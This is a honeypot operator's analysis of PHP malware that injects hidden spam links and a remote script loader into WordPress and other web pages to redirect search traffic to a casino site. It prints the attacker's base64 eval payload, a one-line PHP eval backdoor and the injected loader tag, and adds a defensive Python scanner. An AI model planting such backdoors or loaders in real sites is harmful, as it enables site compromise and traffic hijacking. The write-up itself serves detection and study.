Malware that injects HTML links into HTML, or into program source code that contains HTML (PHP, ASP, JSP, etc.).
The HTML appears to be part of a link-spamming SEO campaign to direct web traffic to a Chinese casino in Macau.
I caught a second download, slightly different from this one, 12 days later. There's active development of this campaign going on.
202.178.125.156 does not have a reverse lookup hostname.
202.178.125.156 appears to belong to a Cambodian ISP:
irt: IRT-ANGKORNET-KH
address: #95, 3rd floor, Preah Norodom Blvd., Sangkat Boeung
address: Raing, Khan Daun Penh, Phnom Penh, Cambodia
route: 202.178.125.0/24
descr: AngkorNet-IP-Address
origin: AS24478
Download via HTTP POST, parameters named "z0" and "svmdO", to URI /phparasites/wp-content/themes/twentytwelve/footer.php.
The attacker apparently assumed a simple PHP backdoor, because the POST parameters have values like this:
[svmdO] => @eval(base64_decode($_POST[z0]));
[z0] => QGVycm9yX3Jlc...
The simple PHP backdoor probably consisted of a line of PHP in footer.php that looks more-or-less like this:
<?php if (isset($_REQUEST['svmdO'])) { @eval($_REQUEST['svmdO']); } ?>
My honeypot sees attempts to install this kind of code on a daily basis. The attackers try a variety of well-known PHP files for WordPress, like the footer file above. Header and Akismet files are also common choices.
- Rework captured information in 202.178.125.156W5cAr0-BlyMDNUfDBtpLTwAAAAE.wso.scans into dc1.php. Change "eval" to "print".
- Invoke php dc1.php > dc2.php to print out what would get eval'ed.
- Pretty print dc2.php to get f1.php. Change the instance of "eval" to "print".
- Invoke php f1.php > dc3.php to print out what would get eval'ed.
- File dc3.php contains what was probably the original source. Pretty print it to yield f2.php for readability.
This malware consists of 3 parts:
- The simple backdoor mentioned above in Download section.
- The inject, the PHP the backdoor evals.
- The injected JavaScript and HTML.
The simple backdoor exists, but its actual form has to remain a matter of conjecture.
The injector source code finds a directory by doing $rootPath = realpath(dirname(__FILE__) . '/../../../../');
The attacker actually invoked http://stratigery.com/phparasites/wp-content/themes/twentytwelve/footer.php.
It may be a coincidence, but the '/../../../../' part of $rootPath would be the Apache web server's DocumentRoot directory. If this isn't a coincidence, it means that the injector source code gets composed individually for each URL that the attacker accesses. This isn't out of the question.
Injector source contains URL of the web site attacked,
a PHP variable for the injected JavaScript/HTML,
and other configuration variables.
Injector code starts at some "root" directory, and performs a recursive search of directories for files named according to a regular expression. It skips file names "." and "..". In Linux, these are hard links to the current directory and the parent directory. Whoever wrote it did at least rudimentary testing.
The method of obfuscation loses the original formatting. We can only examine variable and function names, and programming techniques.
The injector consists of 3 functions, RegexReplace(), str_replace_once() and LinkReplace(), driven by code that does overall organization and sequencing.
The code is reasonably well organized by function: common pieces of code are abstracted into their own functions. The mix of naming conventions might indicate two authors, or a single author without a distinct coding style who works by modifying existing code.
The author of the functions liked the PHP examples from the official PHP on-line documentation: the formal arguments to the functions are named exactly as in the official documentation. For example, str_replace_once() contains
$pos = strpos($haystack, $needle);
Whoever wrote the injector code did not have a mastery of PHP regular expression functions. Although the authors used preg_match() to pick out file names in which to inject JavaScript and HTML, they used a lot of repetitive calls to str_* functions where another preg_* function could have worked.
The injector looks for regular files that have names starting with one of the strings "index", "default", "home", "foot", "head" and containing one of the substrings ".htm", ".asp", ".php", ".jsp", or ".cfm". Since ".htm" is also a substring of ".html", this would find files named foot.html as well as footer.htm, and Java Server Pages, ColdFusion and Active Server Pages files. The regular expression and substring choices are pretty clever, in terms of passing a lot of differently-named, yet probably appropriate, files for code injection.
Successful run of program gives back output like this:
__success__http://stratigery.com/index.php<br />__success__
Clearly an automatically parseable indication of what file had a batch of hyperlinks injected.
Just to see if I read the source code successfully, I defanged the malware, wrote a small sacrificial program, and ran the defanged malware.
PHP before injection, and after injection.
function RegexReplace() has an argument $replacetype1 that causes the injector code to place the injected HTML and JavaScript in slightly different places.
The injector inserts a single, long line of HTML. The HTML consists of a <span class="mylinkcode" style="display:none"> tag. Browsers wouldn't even display the text in that span, but it would appear in the web page's source code.
The injected HTML contains some text in the form of HTML entities, and a <script> tag that would cause a browser or a JavaScript-aware HTML parser to retrieve the contents of http://www.88885333.com/1.js and execute it. It also contains 76 hyperlinks, referencing 76 unique domain names.
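A defender cleaning up after this injector can turn its own target selection against it. The Python below is an added example, not code from the malware or from the original write-up: it walks a web root with the file-name filter described above (prefix in index/default/home/foot/head, one of the .htm/.asp/.php/.jsp/.cfm substrings anywhere in the name) and flags files carrying the hidden mylinkcode span or the 88885333.com/1.js loader. The loose matching in the two regexes is an assumption about how to generalise the literal strings on the page; the WordPress-like directory tree it scans is constructed in a temp directory, including one injected file the injector's filter would never have chosen, to show why a clean-up scan should not inherit that filter.

```python
"""Walk a web root with the injector's own file-name filter and flag files
carrying the hidden-span/loader markers. Added example; the tree is constructed."""
import os
import re
import tempfile
from pathlib import Path

# Name filter as the write-up describes it: the name starts with one of these
# prefixes and contains one of these substrings (".htm" also covers ".html").
PREFIXES = ("index", "default", "home", "foot", "head")
EXT_SUBSTRINGS = (".htm", ".asp", ".php", ".jsp", ".cfm")

# Indicators quoted on the page. Assumption: match the span and the loader URL
# loosely (whitespace, case, quote style) rather than byte-for-byte.
MARKER_RE = re.compile(r'<span\s+class=["\']mylinkcode["\']\s+style=["\']display:\s*none', re.I)
LOADER_RE = re.compile(r'<script[^>]*\bsrc=["\']https?://www\.88885333\.com/1\.js', re.I)


def is_candidate(name: str) -> bool:
    """True for names the injector would consider, e.g. index.php, footer.html, head.asp."""
    return name.startswith(PREFIXES) and any(s in name for s in EXT_SUBSTRINGS)


def scan_root(root: str, all_files: bool = False) -> list[tuple[str, list[str]]]:
    """Return (relative path, reasons) for every flagged file under root.
    all_files=False mirrors the injector's filter, i.e. exactly the files this
    injector could have touched; all_files=True also catches injections dropped
    into files the filter skips (a second tool, or a hand-placed backdoor)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):  # os.walk never yields "." or ".."
        for name in files:
            if not all_files and not is_candidate(name):
                continue
            path = Path(dirpath, name)
            try:
                text = path.read_text(errors="replace")
            except OSError:
                continue
            reasons = []
            if MARKER_RE.search(text):
                reasons.append("hidden mylinkcode span")
            if LOADER_RE.search(text):
                reasons.append("88885333.com/1.js loader")
            if reasons:
                hits.append((path.relative_to(root).as_posix(), reasons))
    return sorted(hits)


def build_sample_tree() -> str:
    """Constructed WordPress-like tree: two injected candidates, one clean
    candidate, one injected file the name filter would skip, one non-code file."""
    root = tempfile.mkdtemp(prefix="wproot-")
    injected = ('<?php get_header(); ?>\n'
                '<span class="mylinkcode" style="display:none">'
                '<a href="http://spam.example/">&#x4E00;</a>'          # constructed spam link
                '<script src="http://www.88885333.com/1.js"></script></span>\n')
    files = {
        "index.php": injected,
        "wp-content/themes/twentytwelve/footer.php": injected,
        "wp-content/themes/twentytwelve/header.php": "<?php wp_head(); ?>\n",
        "wp-content/plugins/akismet/akismet.php": injected,   # not a candidate by name
        "wp-content/themes/twentytwelve/style.css": "body { margin: 0 }\n",
    }
    for rel, body in files.items():
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    for rel, reasons in scan_root(root, all_files=True):
        print(rel, "->", ", ".join(reasons))
```

Point scan_root() at a real DocumentRoot with all_files=True for the clean-up pass; the default mode is useful only to answer the narrower question of which files this particular injector would have rewritten on a given host.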
This JavaScript checks the referrer of the web page it executes from. If the referrer has a substring that relates to just about any search engine (special emphasis on Chinese search engines) the JavaScript sets:
self.location = 'http://www.p99.cool/';
window.adworkergo = 'cc';
That is, if a human starts from some search engine's results page and clicks a link to an injected web page, the browser gets redirected to http://www.p99.cool/.
This looks like some kind of link-spamming SEO. Web pages with the injected HTML invisibly link to spammed web sites, possibly increasing the page rank of the linked-to websites with respect to the key words in the hyperlinked, invisible text. When someone clicks a result in a search engine's results page, their browser first retrieves the web page with the injected HTML and JavaScript. The JavaScript then redirects the browser to www.p99.cool.
By removing the "display:none" attribute in my injected test PHP file, I see this:
Running it through Google Translate gives me this:
These are all the nominal destinations of the invisible links:
The IP addresses matching the DNS names are only from a few ISPs:
AS | IP | BGP Prefix | CC | Registry | Allocated | AS Name |
---|---|---|---|---|---|---|
54600 | 107.148.104.203 | 107.148.0.0/15 | US | arin | 2013-11-08 | PEGTECHINC - PEG TECH INC, US |
54600 | 108.186.50.31 | 108.186.0.0/16 | US | arin | 2013-08-02 | PEGTECHINC - PEG TECH INC, US |
18978 | 172.246.233.2 | 172.246.224.0/20 | US | arin | 2013-04-22 | ENZUINC-US - Enzu Inc, US |
132839 | 172.247.139.52 | 172.247.139.0/24 | US | arin | 2013-06-06 | POWERLINE-AS-AP POWER LINE (HK) CO., LIMITED, HK |
64013 | 185.224.169.205 | 185.224.169.0/24 | NL | ripencc | 2017-10-10 | PING-GLOBAL Ping Global ASN, HK |
45090 | 118.24.100.225 | 118.24.100.0/22 | CN | apnic | 2007-08-03 | CNNIC-TENCENT-NET-AP Shenzhen Tencent Computer Systems Company Limited, CN |
45090 | 118.24.125.80 | 118.24.124.0/22 | CN | apnic | 2007-08-03 | CNNIC-TENCENT-NET-AP Shenzhen Tencent Computer Systems Company |
45090 | 118.25.230.102 | 118.25.224.0/20 | CN | apnic | 2007-08-03 | CNNIC-TENCENT-NET-AP Shenzhen Tencent Computer Systems Company |
45090 | 132.232.148.238 | 132.232.144.0/20 | CN | apnic | 1989-03-23 | CNNIC-TENCENT-NET-AP Shenzhen Tencent Computer Systems Company |
45090 | 132.232.71.95 | 132.232.64.0/20 | CN | apnic | 1989-03-23 | CNNIC-TENCENT-NET-AP Shenzhen Tencent Computer Systems Company Limited, CN |
- PEGTECHINC - PEG TECH INC, US
- ENZUINC-US - Enzu Inc, US
- POWERLINE-AS-AP POWER LINE (HK) CO., LIMITED, HK
- PING-GLOBAL Ping Global ASN, HK
- CNNIC-TENCENT-NET-AP Shenzhen Tencent Computer Systems Company Limited, CN
The URL from which the invisible HTML references a JavaScript program: http://www.88885333.com/1.js
Domain Name: 88885333.COM
Registry Domain ID: 1960318797_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.west263.com
Registrar URL: http://www.west.cn
Updated Date: 2018-04-28T07:46:50Z
Creation Date: 2015-09-14T18:40:59Z
Registry Expiry Date: 2020-09-14T18:40:59Z
Registrar: Chengdu West Dimension Digital Technology Co., Ltd.
Registrar IANA ID: 1556
www.88885333.com has a DNS A record for 107.148.88.69.
There's no reverse lookup for 107.148.88.69.
This IP address appears to have a USA location.
A traceroute shows packets going to Hurricane Electric's San Jose core, and 3 hops later, it's at 107.148.88.69.
whois gives the 107.148.0.0/15 network as belonging to PEG TECH INC, which also hosts some of the IP addresses for the spammed links.
www.p99.cool, destination of redirection
p99.cool has a DNS A record for 107.149.17.196
107.149.17.196 apparently resides in the USA, also at a PEG TECH INC data center.
My guess is that the point of the injected HTML and JavaScript is to direct traffic to www.p99.cool. Various web spiders from search engines retrieve the web pages that have the injected HTML. The text of the hyperlinks gives key words for search engines to attribute to the linked-to websites. It's within the realm of possibility that the linked-to websites are just part of the SEO: they get no extra traffic, except possibly from the search engines, as the links to them are invisible in humans' browsers. They may even have been set up by the SEO campaigners themselves, as a kind of dummy or shell.
When some poor soul searching for, say, "Korean ethics" or "Beautiful Girl Gallery" clicks on a link to a web page with the injected HTML, their browser gets redirected to www.p99.cool, the web page for a casino in Macau.
While there is a Beautiful Girl hanging out with James Bond on the casino's web page, students of Korean ethics will be disappointed.